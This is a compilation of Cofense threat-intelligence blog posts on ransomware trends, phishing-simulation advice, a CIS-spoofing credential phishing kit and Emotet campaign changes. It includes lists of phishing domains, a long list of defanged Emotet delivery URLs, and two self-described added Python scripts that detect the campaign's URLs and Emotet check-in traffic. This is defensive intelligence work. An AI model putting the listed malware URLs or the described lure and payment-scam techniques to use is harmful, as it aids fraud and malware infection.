Ransomware in 2020: Not Just More, But Different

By Aaron Riley, Cofense Intelligence

Cofense Intelligence™ assesses that enterprise-targeted ransomware campaigns will most likely increase in 2020, based on attack and ransom payment trends over the last six months. In the latter half of 2019, ransomware campaigns increasingly targeted public organizations. These attacks frequently crippled an impacted organization’s ability to operate and provide services and, in some cases, resulted in a data breach.

Interestingly, victims are opting to pay the ransom more often. The cost of data recovery, reputation salvaging, and business impact often outweigh the payment itself. Further, those victims with insurance are paying at their insurer’s recommendation, often with the insurance companies covering a good deal of the cost. With enterprise ransomware campaigns becoming more lucrative for the operators, Cofense Intelligence predicts a surge this year.

In the second half of 2019, ransomware campaigns targeted different types of organizations, including schools, governments, and hospitals. Most of the victims offer public services that were disrupted or severely damaged. The Flagstaff, Arizona, school district suffered a ransomware attack that reportedly closed the entire district for two days before services were recovered. Johannesburg, South Africa, was attacked in October 2019 and held hostage for $30,000, the third ransomware attack the city government suffered last year. Ransomware attacks in December 2019 targeted the Oahu Cancer Center in Hawaii and disrupted patient care, including the ability to administer radiation treatment. The victims of these attacks are finding it preferable to pay the ransom rather than deal with the aftermath of data and system loss. Unfortunately, this emboldens future attacks and creates more targets.

We are now seeing ransomware campaigns that include data breaches and exfiltration. Last year, a number of victims of Maze ransomware, a few companies and one Florida city, did not immediately pay up and learned the hard way that a data breach had also ensued. Maze operators exfiltrated data in the course of their attack and released stolen documents, further extorting their victims to pay up and threatening that failure to do so would mean the release of more sensitive information. These ransomware campaigns demanded up to six million dollars in exchange for the decrypted files and used the exfiltrated data as leverage to collect payment. The Maze ransomware operators allegedly exfiltrated around 120GB of data from Southwire during another ransomware attack.

The United States federal government advises organizations not to pay a ransom, as it only encourages further attacks and there is no guarantee the captured resources will be returned in their original form. However, victims are increasingly paying the ransom, as the latter half of 2019 showed. These payments are typically made in a cryptocurrency chosen by the ransomware operators. Jackson County, Georgia paid $400,000 after a Ryuk ransomware attack severely disrupted workflow across all county agencies, including the 911 dispatch center. Jackson County did not have cybersecurity insurance and had to pay the ransom outright, which means the citizens of the county had to subsidize the payment.

Cybersecurity insurance firms are increasingly encouraging their customers to pay the ransom instead of rebuilding or outright losing the resources that were encrypted. Ryuk ransomware impacted Lake City, Florida in late June 2019; authorities found that restoring the systems would cost more than a million dollars, compared to the $700,000 ransom. The Lake City authorities then negotiated through a third party to pay the attackers $460,000, of which the city’s cybersecurity insurance firm reportedly funded $450,000. In this scenario, Lake City authorities paid $10,000 out of pocket and had their systems back up within two weeks. This proves, yet again, that targeted enterprise ransomware attacks are increasingly profitable.

With their profits rising, ransomware operators will likely increase their campaign volume in 2020. The success of ransomware campaigns may encourage the creation of additional ransomware families, requiring global organizations to evolve their cybersecurity posture. With Microsoft’s Windows 7 reaching end of life, organizations that are slow to transition to supported operating systems become more susceptible to such attacks.

We expect other trends to follow in line with our ransomware predictions for 2020. More cybersecurity firms might be utilized as a third-party negotiator for payments. Stolen data can be used in different ways—not just taken hostage—to leverage more money from the victims, especially if unsavory information is exfiltrated. More and more enterprise organizations are expected to include cybersecurity insurance within their yearly budgets. In short, it appears more companies are making business decisions that demonstrate an understanding of the likelihood of ransomware attacks. While it is good to be prepared, feeding the beast of ransomware will fuel cybercriminals looking to make big bucks.

HOW COFENSE CAN HELP

Every day, the Cofense Phishing Defense Center analyzes phishing emails with malware payloads that bypassed email gateways. 100% of the threats found by the Cofense PDC were identified by the end user. 0% were stopped by technology.

Condition users to be resilient to evolving phishing attacks with Cofense PhishMe and remove the blind spot with Cofense Reporter.

Quickly turn user reported emails into actionable intelligence with Cofense Triage. Reduce exposure time by rapidly quarantining threats with Cofense Vision.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Jeopardy GOATs Buzz In, Security World Groans

By Tonia Dudley

When Jeopardy invited its top players ever to battle it out, the winner would be crowned the Greatest of All Time (GOAT). Not the Pretty Goodest or the Gosh, Nice Try-est. And certainly not the Wow, You Very Nearly Failed-est.

But when three acclaimed geniuses hit the buzzers last week, those were the titles they earned in the cybersecurity category. The contestants missed two out of five. No big deal? Normally not, but these guys were the best of the best—and their combined score of correct answers equaled 60 percent. In most grading systems, that’s one point shy of an ‘F.’

I mean, shouldn’t a Jeopardy GOAT be good at almost everything?

Really? They missed ‘BYOD’?

Yes, they did. And it was worth $600, a pretty generous sum for a pretty easy answer.

It was exciting to see cybersecurity included in this highly watched episode. To be fair, I thought the show came up with an interesting selection of topics. Ransomware. Keylogger. Whitehats. And sigh, BYOD. Again, if this were a normal episode (or a normal game show) you’d expect easier questions. But hey, this is Jeopardy, GOAT Edition.

Here’s the dagger: current GOAT tournament leader Ken Jennings is in IT. Ken, you let us down, man! Okay, “keylogger.” Not everybody knows what it means.

But, sorry to say this, a real genius would. To claim GOAT status, you need to go beyond the basics. And not wait until the other categories are nearly exhausted before summoning the courage to tackle cybersecurity. Call me biased, but it’s a pretty important subject these days.

Kudos to the players for knowing what bitcoin is.

And for nailing HTTPS and whitehats. But millions of people watched this episode. Ken, Brad, and James could have shown America that any self-respecting GOAT knows cybersecurity as well as The Oscars or American Idol.

And couldn’t there have been one measly phishing question? “Who is John Podesta, Alex?” Or “What is a fraudulent email?” The FBI published two alerts last year on business email compromise alone.

All right, enough griping. At least our industry got some recognition. But if Jeopardy ever includes us again, I want the players to do better than a D+.

In 2020, Resolve Not to Simulate Last Year’s Phish

By Tonia Dudley

As you start off the new year, it’s a good time to recalibrate your phishing simulation program. Things change—business objectives, mergers, acquisitions or divestitures. The threat landscape is constantly changing too and may require a complete shift in your security awareness efforts. This is why you should focus on one quarter at a time—we’d all be millionaires if we could predict the future 12 months from now.

Align Your Simulations to the Phish Your Users See.

As you prepare to launch simulations this quarter, ensure you align these to the threats actually hitting your users’ inbox. By keeping your campaigns aligned, you are better preparing your users to defend your organization against a phishing incident that could lead to a data breach or ransomware attack.

How do you achieve this? Start by reaching out to your Security Operations Center (SOC), the experts on the threats facing your organization. Also, many organizations are now standing up a Cyber Threat Intelligence team to proactively hunt for threats—these analysts are another great source of anti-phishing recommendations.

Planning a Credential Phish? Attackers Probably Are.

If you don’t have access to either of these resources, check out our most recent Cofense Annual Phishing Report. For example, we continue to see phishing emails that target credentials. Whenever I visit customers or talk to security teams, I ask if they are seeing credential phishing as a major threat to their organization. Without skipping a beat, the response is typically an immediate “yes” followed up with a real phishing incident story.

Figure 1: Sample credential phish

Running a credential phishing campaign can sometimes be complex, but compared to the time spent remediating a phishing incident, it is time well spent. Chances are a credential simulation will pay off. Consider this nugget from our Annual Phishing Report:

74% of Real Phish Are Credential Phish

But Credential Phish Are Only 17.2% of Simulations

That’s a gap in your phishing awareness program you don’t want to see.

Don’t Forget Tax Season, Plus Data Privacy and Valentine’s Days.

Beyond credential threats, the first quarter of the calendar year offers seasonal themes. I’ve seen some awareness programs use a topics calendar, and the following topics are good bets for the first few months of the year.

  • Data Privacy Day – January 28th.
  • Tax season – anything related to tax topics and W-2s piques interest.
  • Valentine’s Day
    • I know some of you are right now thinking about that Valentine’s e-Card you want to send out. We recently covered holiday-themed campaigns used by the Emotet botnet in our December blog post. If Emotet comes back online, we’ll most likely see them leverage a similar holiday theme again. If you want to align a Valentine’s theme to a real threat, focus on an attachment that leverages a macro-enabled MS Word document. Speaking of Emotet, because it’s one of the biggest botnets out there, Cofense led off our new podcast series, Phish Fryday, with an Emotet deep-dive. Check it out here.

Whatever topics or themes you choose, just be sure they reflect the email threats your users will likely see. Whether your program is mature (and needs a jolt) or you’re just getting started, good luck! The Cofense resources below can help you move from awareness to full-strength phishing defense.

Organization of Post-Soviet States Spoofed in Phishing Email

By Julie Hall and Dylan Duncan

Cofense Intelligence™ has detected a Russian-language credential phishing campaign that spoofs a well-known financial organization and delivers a malicious PDF to end users. The campaign spoofs the Commonwealth of Independent States (CIS), a legitimate post-Soviet nations organization portal, and claims to offer ruble compensation. The phish is delivered as a blank email carrying a PDF file that contains a redirect link to a Russian-language phishing site. Cofense has observed the phish making its way through Microsoft’s Exchange Online Protection (EOP) secure email gateway, and it may have bypassed others.

Notably, all domains that Cofense Intelligence has recorded in this campaign contain valid certificates and were recently registered between November 19th and December 1st, 2019. Figure 1 presents the phishing email that contains no context, just a PDF attachment.

Figure 1: Phishing Email

A blank email with no context like this generally means that only curious, unsuspecting recipients open the attachment and end up at the phishing portal. In this case, once the PDF is opened, the recipient is presented with an image and a link, as shown in Figure 2.

Figure 2: PDF File

Clicking the hyperlink, which requests the end user to review a document, redirects to a phishing site, as shown in Figure 3. The phishing attack consists of multiple steps. The spoofed financial service claims to offer eligible citizens monetary compensation; however, they are only given a limited time frame to register their claim. To claim the compensation, visitors must submit a bank card number and a Voila (cryptocurrency token). After providing the information, users are prompted to pay a randomly generated fee before receiving the compensation.

Figure 3: Landing Page of Phishing Attack

To create a false sense of authenticity, every 30 to 60 seconds the site generates one of 10 pop-ups claiming that a user has received compensation (see Figure 4). The site also accepts any input and performs no validation, so every visitor can be walked through all of the steps regardless of what they enter. This combination of techniques (the limited time frame, the spoofing of a legitimate organization, a large compensation offer, and recently registered domains with valid certificates) creates a sense of legitimacy and builds excitement and urgency for recipients. These Tactics, Techniques, and Procedures (TTPs) cloud judgment and lower the victim’s guard.

Figure 4: Received Compensation Pop-Up

The domains contain an open directory with an accessible phishing kit, FKG.zip. The kit contains multiple HTML, JavaScript, and JavaScript Object Notation files. The .html files link to the web pages of the phishing attack while the JS and JSON files control the functionality of the phish.

In the file upssels.js, the domain clickpay24[.]tv is called as a payment API to accept direct payments from the users. After completing each step of the phish, recipients are redirected to a payment site generated by clickpay24. The generated URLs follow the pattern az-payout.com[.]com/buy/<16 Integers>, where the 16 integers are random.

Preventing email-borne intrusions of this kind starts with security awareness as the first line of defense. Alongside automated anti-phishing tools, educating company personnel on new phishing trends is the best way of countering a campaign such as this.

Table 1: Domains associated with the campaign

Domain               Registration Date
h-formpay-a[.]top    November 19, 2019
x-a[.]top            December 1, 2019
Luckyclick[.]best    November 24, 2019
m-f1[.]top           December 1, 2019
c3p-cl[.]club        November 29, 2019
o-k-f.aadfk[.]top    November 28, 2019
m-go[.]top           November 11, 2019
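For defenders, the kit details above (the clickpay24 payment API and the /buy/<16 integers> payout URLs) and the domains in Table 1 translate directly into a proxy-log check. The script below is an added example, not code from the Cofense post or from the phishing kit; the proxy-log line format and the sample lines are constructed for illustration, and the indicators are kept defanged exactly as the post prints them.

```python
import re
from urllib.parse import urlparse

# Indicators as printed in the post: the Table 1 domains plus the clickpay24
# payment API domain referenced from upssels.js, kept defanged with "[.]".
WATCHLIST_DEFANGED = [
    "h-formpay-a[.]top", "x-a[.]top", "Luckyclick[.]best", "m-f1[.]top",
    "c3p-cl[.]club", "o-k-f.aadfk[.]top", "m-go[.]top", "clickpay24[.]tv",
]

# The post describes generated payment URLs ending in /buy/<16 integers>.
PAYOUT_PATH = re.compile(r"^/buy/\d{16}$")


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into a matchable, lower-cased hostname."""
    return indicator.replace("[.]", ".").strip().lower()


WATCHLIST = {refang(d) for d in WATCHLIST_DEFANGED}


def host_on_watchlist(host: str) -> bool:
    """True if host is a watchlisted domain or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in WATCHLIST)


def classify_url(url: str) -> list:
    """Return the reasons a URL matches this campaign ([] when it does not)."""
    parsed = urlparse(url)
    reasons = []
    if host_on_watchlist(parsed.hostname or ""):
        reasons.append("watchlisted-domain")
    if PAYOUT_PATH.match(parsed.path):
        reasons.append("payout-url-pattern")
    return reasons


def scan_proxy_log(lines) -> list:
    """Scan whitespace-separated proxy lines: '<timestamp> <client> <method> <url> ...'.
    This line format is an assumption made for the example, not a Cofense format."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed or truncated line: skip it rather than crash
        timestamp, client, method, url = fields[:4]
        reasons = classify_url(url)
        if reasons:
            hits.append({"timestamp": timestamp, "client": client,
                         "method": method, "url": url, "reasons": reasons})
    return hits


# Constructed sample proxy log (not real traffic); clients and timestamps are
# made up, and the payout host is spelled as the post prints it.
SAMPLE_LOG = [
    "2019-12-02T10:14:07Z 10.0.0.12 GET https://h-formpay-a.top/index.html 200",
    "2019-12-02T10:15:22Z 10.0.0.12 GET https://az-payout.com.com/buy/1234567890123456 200",
    "2019-12-02T10:16:01Z 10.0.0.30 GET https://example.org/buy/123 404",
    "2019-12-02T10:17:45Z 10.0.0.12 POST https://www.clickpay24.tv/api/pay 302",
    "garbage line",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit["timestamp"], hit["client"], ",".join(hit["reasons"]), hit["url"])
```

Subdomain matching is deliberate: the kit's payment redirects and landing pages may sit under hosts of the registered domains rather than at the apex.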
Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 34008.

Want to simulate a holiday phish? This one’s from your friends at Emotet.

By Tonia Dudley

’Tis the season when organizations are looking to send out the year’s last phishing simulation. Often the Security Awareness team lands on a holiday theme – holiday party, holiday raffle, or even the fun ugly sweater lure.

In the past, when I worked with teams to advance their phishing defense programs, I would recommend staying away from holiday themed scenarios. I’ll explain why in a moment. But my opinion has changed, thanks to the threat actors behind Emotet.

We first saw Emotet using a holiday theme in late October as Halloween approached. This was an interesting shift: not only did it include a macro-enabled MS Word attachment, but the lure was one the operators had created themselves, whereas many of their templates come from scraped inboxes and leverage real email conversations. Fast forward to the year-end holiday season, when organizations host parties to celebrate. Our Cofense Labs™ team closely monitors the Emotet botnet, and thus we began seeing the holiday theme hit the wire. Within a few days, we also saw additional language translations. Ah! They enlist translators!

Figure 1: Emotet Holiday Themed Email

When you look at the email in Figure 1, it’s not pretty or well formatted – unlike the templates used in simulation campaigns. What else do you notice about this attachment? Does your organization still use .doc for MS Word? Not likely. I can imagine if you’re required to get management approval for your campaigns, you would be told to go back to the drawing board and get more creative.

However, if your phishing defense program is aligned with active threats hitting organizations, then this is exactly the template you should be using to train your users to identify a real phish. We don’t do our organizations justice when we craft really fancy templates that don’t align with what threat actors are sending to your users’ inbox. When we took a look at one of our fancy social media invites, the susceptibility rate was around 7%.

However, when we looked at a template that modeled a real active threat, the susceptibility rate was almost 52%.

Figure 2: Examples of Simulated Holiday Phish

During the month of December, Cofense sees an uptick in requests from customers to create “custom” holiday phishing simulations. Again, these are typically fancy, made-up emails that mimic an eCard (and are blocked by most Secure Email Gateways), the type of email we don’t see hitting our active threats queue when we’re monitoring real phish in the wild.

Until now. So by all means, go ahead and simulate a holiday phish. Just remember to keep it real.

Cofense PhishMe offers a simulation template, “Christmas Party – Emotet,” to educate users on the phishing tactic described in this blog.

Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 34972.

5 Cybersecurity Trends that Will Dominate 2020

By Aaron Higbee, CTO, Cofense

The threat landscape continues to evolve at a rapid pace, with new threat vectors emerging and increasing in sophistication. Which ones should you watch most closely as 2020 unfolds? Based on insights collected from our Cofense research teams, here are five trends we see dominating next year.

Ransomware will continue becoming more targeted to reap more sizeable payouts.

Many people are under the impression that ransomware is slowing down, but in reality it’s simply being used in a more targeted fashion. So many private and public organizations, as well as government entities, have been infiltrated by ransomware that we’ve become desensitized to its devastating effects.

Ransomware is very much alive, and more sophisticated actors are using it every day as a gateway into an organization’s network, once they identify crown jewels left vulnerable. One of the reasons why we’re not hearing as much about ransomware in the media is that attacks are increasingly difficult to cover. Due to cyber liability insurance policies and law enforcement involvement creating so much red tape, the real information is shrouded in secrecy and not making it into the public domain. Threat actors will continue to refine their targeting in 2020 in order to maximize their profits with organizations that don’t have an advanced security posture but do have a lot to lose.

Healthcare and genetic testing organizations will be a rich target for monetizing data.  

Healthcare organizations will always be one of the richest targets for ransomware and consumer fraud, as they provide easy access to valuable information, such as social security numbers, that can be monetized quickly. But as we look to the future, the prospect of malicious actors hacking into a database of a genetic testing company is especially disturbing. Not only would a threat actor have a detailed record of medical history and family heritage, but if the ethics of gene editing evolve further, and that is not far off, a master log of thousands, if not millions, of people’s DNA is potentially available for attackers to exploit.

Cryptocurrency will find itself in the crosshairs.

The cryptocurrency industry is not widely understood, but it is on the receiving end of some of the most advanced attack methods we’ve seen to date. Whether it’s a high-profile crypto holder or an entire cryptocurrency exchange, we’ve seen first-hand at Cofense how this realm of cyberspace is impacted by elite phishing tactics. Ultimately, the hackers look at their targets from two angles.

The first applies if you are an individual cryptocurrency holder: is your line of defense weak enough for an attacker to compromise you, log into your exchange, steal your cryptocurrency, and transfer it out? The second applies to organizations: is one of your employees (it only takes one) susceptible to clicking on a phishing link, so the attacker can get into your entire network and dig deep enough to reach the cold storage vaults and pull off a heist?

The latter is far more likely, as organizations often neglect to train their employees to identify malicious emails. They mistakenly believe that more expensive, “we-promise-to-stop-it-all” technologies will thwart every attack. The reality is that the circle of trust at some organizations is so large that their employees are really the first and last line of defense against an attack.

SIM-jacking will be used to jack cryptocurrency.

SIM-jacking is a trend that has recently emerged and will pick up speed in 2020, due to its success and the ease of implementation. Instead of wasting time trying to infiltrate the source, SIM hijackers will go to someone who works for a telecom company and pay them off to assign your phone number to another device and then use that phone number to reset your passwords and steal your cryptocurrency. In fact, one major U.S. telecom company is currently in the throes of a lawsuit following a handful of employees who helped hackers rob a customer of $1.8 million worth of cryptocurrency. It is heavily debated who exactly is at fault for SIM-jacking attacks, and while cybercriminals are obviously at fault, there are several layers to the attack that blur the lines.

Information warfare will put human intuition to the test.

In an era of fake news, information warfare is a very real consequence of social media platforms and an influx of news outlets. The public has to rely on, and decipher between, numerous news sources that offer little evidence, and much to the imagination, when it comes to the root cause of most stories.

Evidence is the key to validating any story. At Cofense, we stress the importance of conditioning people to recognize fake from real—phishing emails and other scams that target employees at work and home.

Human intuition is one of the most powerful tools in your arsenal, and it’s vital to hone it as a natural defense mechanism to combat against all types of threats, whether it’s fake news, a conspiracy theory, or a scam designed to bilk your company of its data, funds, or brand reputation.

To stay on top of phishing and malware threats in 2020, be sure to check this blog. We’ll continue to share our teams’ findings, both what we see in the wild and what evades the email gateway.

Emotet Modifies Command & Control URI Structure and Brings Back Link-based Emails

By Noah Mizell, Cofense Phishing Defense Center

Emotet has been busy wrapping up the year with some minor tweaks to their client code and the reintroduction of some tactics that have worked well for them in the past. The botnet that began its life as a banking trojan in 2014 has proven to be a formidable threat to organizations around the world and shows no signs of stopping. Before we look at their recent changes, let’s begin with a quick review of some of the notable updates we have observed this year:

  • January 13, 2019 – The Emotet botnet reemerges from vacation to begin its first campaign of the year.
  • January 28, 2019 – Experimentation with Qakbot as a payload.
  • March 14, 2019 – The client code is changed to utilize a wordlist to generate random paths when checking into the Command & Control (C2) and now uses the POST method instead of GET. The use of JavaScript attachments is noted as well.
  • April 9, 2019 – The botnet operators begin using the emails that were stolen starting in the last part of their 2018 campaign. The use of stolen content provides the ability to create spear-phishing like emails on a scale never seen before.
  • May 31, 2019 – Emotet goes on summer vacation shutting down a large part of its infrastructure.
  • September 3, 2019 – C2 begins to come back online.
  • September 16, 2019 – Spamming operations resume. Link and PDF attachment based emails are very limited. The vast majority of their campaigns are macro document-based. Heavy use of the reply-chain (stolen email) tactic is observed.
  • Large deployments of TrickBot and Dreambot are used as secondary infections throughout the year.
  • The term “Triple Threat” is created to note the high incidence of Emotet -> TrickBot -> Ryuk infections seen in the wild, leading to massive ransomware payments and a great deal of lost time and money for many government and private organizations.

Starting on November 27th, we noticed a change in the way the Emotet client code was checking into the C2 servers. Gone are the random paths generated from the word list (Figure 1) that were seen in the past.

Figure 1: URI structure introduced in early 2019

Figure 2: The new URI structure seen as of Nov. 27

The clients are now adding a path that, at first glance, appears to be a random string with a minimum length of four characters.  A slightly deeper investigation into this traffic shows the path is actually the key from the key/value pair in the posted form data.  This change is odd, as it does not actually alter the check-in data in any meaningful way and appears instead to be more cosmetic in nature. This leads us to believe that it may have been a rudimentary attempt at identifying researchers who are running emulation code alone, as their check-in structure would not have dynamically changed when the code base was updated.
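As an added illustration of the change just described (this is not Cofense code and not the Emotet client's own logic), the following Python checks captured POST requests for the new pattern: the last path segment is at least four characters long and equals the key of the posted form data. The sample requests, key names, paths and hosts are constructed, and the four-character minimum is taken from the description above; treat the check as a triage heuristic to combine with other traffic context rather than as a definitive Emotet signature.

```python
"""Heuristic for the Emotet check-in change described above.

As of Nov. 27, 2019, the client POSTs a single key/value pair of form
data and reuses the form key as the request path.  This check compares
the last path segment against the posted keys and flags a match.
"""
from urllib.parse import parse_qs, urlsplit


def path_segment(uri: str) -> str:
    """Return the last non-empty path segment of a request URI (query ignored)."""
    path = urlsplit(uri).path
    return path.rstrip("/").rsplit("/", 1)[-1]


def form_keys(body: str) -> list:
    """Keys of an application/x-www-form-urlencoded request body."""
    return list(parse_qs(body, keep_blank_values=True).keys())


def looks_like_emotet_checkin(method: str, uri: str, body: str, min_len: int = 4) -> bool:
    """True when a POST's last path segment equals one of its form keys.

    min_len mirrors the page's observation that the 'random' path has a
    minimum length of four characters.
    """
    if method.upper() != "POST":
        return False
    seg = path_segment(uri)
    if len(seg) < min_len:
        return False
    return seg in form_keys(body)


def scan_requests(requests):
    """Yield (index, uri) for every (method, uri, body) tuple the heuristic flags."""
    for i, (method, uri, body) in enumerate(requests):
        if looks_like_emotet_checkin(method, uri, body):
            yield i, uri


# Constructed sample traffic (not captured data): key names, values and
# paths are invented; only the structure follows the page's description.
SAMPLE_REQUESTS = [
    # new-style check-in: path segment equals the form key
    ("POST", "/Wq5TzK/", "Wq5TzK=AAAAB3NzaC1y..."),
    # old-style check-in: word-list path, unrelated form key
    ("POST", "/cone/viewer/child/", "Xa7pQ=AAAAB3NzaC1y..."),
    # ordinary web form: path is a file name, not the key
    ("POST", "/login.php", "user=alice&pass=secret"),
    # GET with a matching segment must not count
    ("GET", "/abcd/", "abcd=1"),
]

if __name__ == "__main__":
    for i, uri in scan_requests(SAMPLE_REQUESTS):
        print(f"request {i}: {uri} looks like an Emotet check-in")
```

A single match on its own is weak evidence; the value of the check is that it keys on the structural quirk the page describes rather than on any particular path string, so it survives the next word-list rotation.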

Figure 3: Example Emotet delivery email

Another noted change was the reintroduction of link-based email templates. We have seen Emotet emails use links with great success in the past. For unknown reasons, the threat actors did not seem to use them when coming back from summer vacation. In all likelihood, they are using them now to maximize their victim count before breaking again for the winter holidays.

A listing of some of the URLs seen on the first day back is included further below. Heavy distribution of TrickBot has also been seen in recent campaigns as a secondary infection and may be a money grab to fund their holidays.

Figure 4: Example Emotet delivery email

As with past campaigns, we have also seen an uptick in the use of shipping company themed emails to coincide with the holiday season, a recurring theme for the actors around this time of year. One change to the email templates that appears to be a new lure is an “Open Enrollment 2020” theme to entice users who have not yet decided on their insurance program for the upcoming calendar year.

The Emotet actors are masters at creating email templates that exploit a user’s emotional response, and this is a prime example.

Cofense’s research teams – Cofense Labs, Cofense Intelligence and the Cofense Phishing Defense Center – actively monitor the Emotet botnet to identify phishing threats that may impact customers and to provide security operations with the latest campaign data.


HOW COFENSE CAN HELP

100% of malware-bearing phishing threats analyzed by the Cofense Phishing Defense Center are reported by end users and bypassed technical controls that were in place to protect them.

Cofense PhishMe offers a simulation template, “Order Confirmation – Emotet/Geodo,” to educate users on the phishing tactic described in this blog. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe and remove the blind spot with Cofense Reporter.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence. Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 34580.

Quickly turn user reported emails into actionable intelligence with Cofense Triage and reduce exposure time by rapidly quarantining threats with Cofense Vision.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

hXXp://3mbapparel[.]com/ce8p4mw/Scan/23sr2r3h-227136449-4100-o7f3aukln-5ek9w7yx/

hXXp://abbasghanbari[.]com/cgi-bin/m2gx-j9l-2674/

hXXp://abis[.]abis-dom[.]ru/wp-content/multifunctional-zone/external-portal/XKnI9c95VXtO-2koeL1odjG8e45/

hXXp://adrianoogushi[.]com[.]br/blogs/available-resource/test-forum/CO37HIcUG-4KiqqruHlj9/

hXXp://agramarket[.]com/wp-admin/554841538461/9igxpru22w-3404-624501945-dtenc-cvona7/

hXXp://agramarket[.]com/wp-admin/images/Document/
hXXp://aijiuli[.]com/wp-content/common-3644746801311-F61eGi6VrRfSERpV/guarded-722116w-9jx99j5uyog/2b51q65tivz3f97-3vw70xy142675/

hXXp://alfaem[.]by/wp-includes/wcevu12a6j/ui13miem-1842496-647941-b1maguvyl7-0wm1/

hXXp://allgamers[.]ir/wp-content/6270900376591-TrHEgUBtm-sector/verified-portal/3rw-x42z0/

hXXp://aminulnakla[.]com/test/5mpub-u9jdh-1356/

hXXp://amoutleather[.]com/a/multifunctional_9313571_Y9mwVe/additional_forum/EAvHHxYA2_z07m8sM36w72/

hXXp://anantasquare[.]com/wp-content/Documentation/1yzenuu55v/zdx0oqd5mp-79785-92241-lqk84aode-i65yma2m1/

hXXp://andishkademedia[.]com/wp-includes/8vcppv-4l1-885316/

hXXp://anhjenda[.]net/wp-content/vmpyh5c3pi/

hXXp://anjumpackages[.]com/nrri/private_44709616882_WQZDa1KAyj/corporate_V6tkmPmj_jRcx2PfQ/on3_1v7649ys6t1/

hXXp://aquimero[.]net/wp-includes/8gdm6-y4kj-461/

hXXp://archinnovatedesigns[.]com/wp-includes/464728-V0rjOQkXZi4SSiW-disk/580333-3VP9JZcfWI6-cloud/028eeth-vu553tyw/

hXXp://arielcarter[.]com/j7foqo2/DOC/iqrh6hczo0cw/

hXXp://arttoliveby[.]com/yyrye/private_86192_eZoBMjbfcDvuPq/test_cloud/ws3uh67ha1tup_5128t108/

hXXp://auliskicamp[.]in/wp-admin/common_resource/verified_vZUVdO8ppY_CWfMSl2yMCEH/bgJEju1jvH_3iNK6o4Ii4G/

hXXp://awooddashacabka[.]com/yt46/open-box/individual-area/yNmy5HQif-8o8tG738h2/

hXXp://babdigital[.]com[.]br/wp-content/esp/6v5nej75l/

hXXp://bakeacake[.]com/wp-admin/available-disk/security-warehouse/z1XGaZ-NemjMNrc3a/

hXXp://bassigarments[.]com/wp-content/personal-592742204-WBrGGz/4469690-7SOBhN7gbB7s-area/b90h417-wtxsw/

hXXp://batdongsanhathanh[.]net/wp-admin/open-resource/568A8V-ILYyxINK-profile/jdux7bsdp-twyu179678t1/

hXXp://beiramarsushi[.]com[.]br/1g3ld9f/closed_n941_aUn1fAfrvX8Bhu/test_warehouse/6N1JhlV_M8oi1aM9Gyw/

hXXp://best-fences[.]ru/css/4ey-6v7y0-5856/

hXXp://betaoptimexfreze[.]com/bebkat/Reporting/9zooeodt/x827ofzp-289202990-87262-q99cri9-xr06/

hXXp://bgctexas[.]com/quietnightcompany/xb1k2g9/personal_zone/test_WlYEqat2Ie_OgiyQ9W40qCyP/bw54a4lhlrx_9636w4uu0xsxt1/

hXXp://bilgigazetesi[.]net/a6lwm1m/open_sector/special_forum/Ej4oMEQf3AN_Gudt5tx97J/

hXXp://bimattien[.]com/wp-admin/eTrac/ld6u234c3/ga438o-5744266-474284-eejhd-5ctewz/

hXXp://blicher[.]info/wp-includes/KPrV/

hXXp://blog[.]inkentikaburlu[.]com/70jjm53klo/sites/2yd7bvuh-505209-64670737-fr4vs-t7zp3cjl0/

hXXp://blog[.]sawanadruki[.]pl/wp-content/uilb8dz6_hwpeyvx_sector/security_warehouse/0gKrzfjYpvFO_3yLM891Meliz/

hXXp://blogkolorsillas[.]kolorsillas[.]com/wordpress/xnq1k-rkkl-803/

hXXp://bluemedgroup[.]com/wp-admin/mnfd8_nbij_436575782_UQEO1IVCs4LqadTV/security_profile/XODmvThQGR7_H7vrzccMec5/

hXXp://bmrvengineering[.]com/wp-admin/FILE/

hXXp://bookitcarrental[.]com/wordpress/INC/iddp2ggtm/eccvup8c-3843-818470-69yg4b28wh-w1kxriyo/

hXXp://bupaari[.]com[.]pk/RoyalAdventureClub[.]com/eTrac/ncevpoamvlp0/

hXXp://buyrealdocumentonline[.]com/wp/Documentation/d7mz-688402499-7314933257-fkwggnu-t4ybrvaf7/

hXXp://cabosanlorenzo[.]com/wp-load/protected-resource/verifiable-tk2c-3kfk3g9iz/ebub24rmzo8-9u88717yx935/

hXXp://cacimbanoronha[.]com[.]br/wp-content/Scan/

hXXp://caotruongthanh[.]com/wp-admin/qeku-4ys4-83891/

hXXp://carolscloud[.]com/media/public/

hXXp://carolzerbini[.]com[.]br/6ttp7t0/Overview/qoawf12j0jbp/

hXXp://carvalhopagnoncelli[.]com[.]br/lvqhz/Overview/0rrnguk8z/lg4qyh7-338411-43458560-pp7dts1ba-3msz/

hXXp://cas[.]biscast[.]edu[.]ph/updates/personal_sector/verifiable_warehouse/D3buvGg_1yyMJGrM6gp/

hXXp://casaquintaletcetal[.]com[.]br/e6viur/04383245_xZw1ZKxX_41063_29gQlRhcVl5eGs/additional_area/4004h_s035tt6461/

hXXp://casinovegas[.]in/cgi-bin/protected_module/additional_warehouse/NzQU7EbxmY_mLobpJqHn8Lh8/

hXXp://catchraccoons[.]com/wp-admin/open_9135304_x3VG052S9vjEZN/external_warehouse/AgnasV_o0M4JIrNt67j/

hXXp://caughtonthestreet[.]com/sh5bne/available_sector/test_mhc3xk01u_if5a3isqhztj4/fwpqcd9admvnur_yuu17s15/

